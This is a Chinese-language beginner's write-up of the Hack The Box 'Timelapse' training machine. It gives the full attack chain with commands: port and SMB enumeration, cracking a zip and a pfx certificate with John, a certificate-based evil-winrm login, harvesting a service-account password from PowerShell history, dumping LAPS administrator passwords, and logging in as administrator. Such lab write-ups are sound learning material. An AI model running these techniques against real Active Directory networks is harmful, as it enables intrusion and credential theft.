Hack The Box-一款有意思的滲透測試平臺

前言

Hack The Box是國外的一個網絡安全在線平臺，允許用戶實踐滲透測試技能，并與其他類似興趣的成員交流想法和方法。它包含一些不斷更新的挑戰，其中一些模擬真實場景，其中一些更傾向于CTF風格的挑戰。

Hack The Box還提供了Rank機制來作為我們挑戰的動力，通過通關靶場來去獲取積分提高自己的排名。

Hack The Box官網：https://www.hackthebox.com

如何開始

在注冊好賬號之后，我們需要去下載兩個連接文件。在自己的home頁面的右上角有一個Connect to HTB。

需要申請這兩個連接文件，具體操作參考：HTB連接

正題：Timelapse靶場

連接

這是我的兩個連接文件，

利用kali自帶的工具進行連接

連接成功。

啟動靶場

選擇好靶機后，點擊Join Machine就能啟動靶機，靶機會提供一個IP。

開始測試

靶機IP：10.10.11.152

連通性測試

ping 10.10.11.152

端口掃描

nmap -sC -sV  -oN myscan.txt 10.10.11.152

通過端口掃描發現，主機開放了一下端口，

查看smb共享，

smbclient -L 10.10.11.152

存在如下共享目錄，

在Share的Dev目錄下發現一個壓縮包，

獲取壓縮包文件（獲取可能會失敗，多嘗試幾次），

解壓時發現需要解壓密碼，

利用zip2john進行解密，

提取壓縮包的hash值，

zip2john winrm_backup.zip >> hash

利用字典進行爆破，

john --wordlist=/home/Password-Top1000（1010）.txt hash

爆破出密碼為：supremelegacy。

解壓出來的文件還需要密碼才能訪問，

之前爆破出來的密碼不正確不能訪問，

pfx文件是經過秘鑰加密的，我們可以使用命令openssl進行分析，并且要同時使用pkcs12文件工具，生成和分析pkcs12文件，

導出pfx文件的hash，

pfx2john  legacyy_dev_auth.pfx >pfx_hash

再次利用john爆破密碼，

john --wordlist=/home/PassWord.txt pfx_hash

密碼為：thuglegacy

發現這是個私鑰文件，

利用openssl進行生成，三個密碼都是我們之前生成的得到的thuglegacy，得到了私鑰文件。

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key

得到私鑰文件，還需要生成證書，

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

在開頭信息收集的時候看到了開啟了5986端口，這個端口是用于橫向滲透的端口，可以使用命令evil-winrm進行連接。

利用生成的私鑰文件和證書進行登陸，

evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u

登陸密碼為我們前面設置的密碼，

成功找到user.txt文件，

這樣就拿到了userown了，但是目標是要拿到systemown，就需要進行提取。

提權

上傳提權文件

upload /home/winPEASx64.exe

下載地址

運行該文件

找到一個歷史文件

下載該文件

download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

查看文件內容

找到一個用戶和密碼

使用該用戶憑證

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck

$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force

$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)

傳遞命令

*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}

timelapse\svc_deploy

*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}

dc01

抓取用戶憑證

使用AD-Module,查看 LAPS 密碼

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

成功獲取到administrator的密碼。

嘗試登陸

evil-winrm -i 10.10.11.152 -S -u 'administrator' -p 'z+&4Olgpgn;,11t5XbE#x0,2'

成功登陸。

最終在rtx用戶的桌面找到root.txt獲得系統擁有權。

后記

作為一個剛入行的小白，第一次發表文章，求大佬們多多指點！